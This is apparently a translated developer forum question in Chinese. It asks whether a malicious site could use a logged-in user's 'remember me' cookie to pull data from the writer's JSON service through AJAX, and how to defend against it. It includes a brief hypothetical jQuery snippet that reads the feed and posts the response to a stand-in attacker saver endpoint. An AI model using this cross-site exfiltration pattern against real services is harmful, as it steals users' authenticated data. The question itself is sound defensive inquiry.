我们有一个 JSON Web 服务,我们的一个网页使用它来显示“实时”数据。要访问该页面,用户必须登录。我们担心恶意网站(竞争对手)获取这些数据的能力。但是,我不确定我们预期的问题是否合理。
一旦用户登录,我们会在他们的机器上存储一个“记住我”cookie。如果有人要建立一个向我们的 Web 服务发出 AJAX 请求并说服登录用户访问该站点的站点,他们是否能够从我们的服务中检索和存储信息?如果是这样,我们如何保护自己免受此类事情的侵害?
例如:
恶意网站是否可以构建这样的脚本来获取我们的数据:
$.post('their.secret.json', function(response) {
$.post('our.malicious.response.saver', {save: response}, function(ourResponse) {
alert('we saved your stuff!');
}
});
由于他们正在访问我们的 JSON 提要,它不会将 cookie 发送到我们的站点并且用户将通过身份验证。既然他们会被认证,它不会发回敏感数据吗?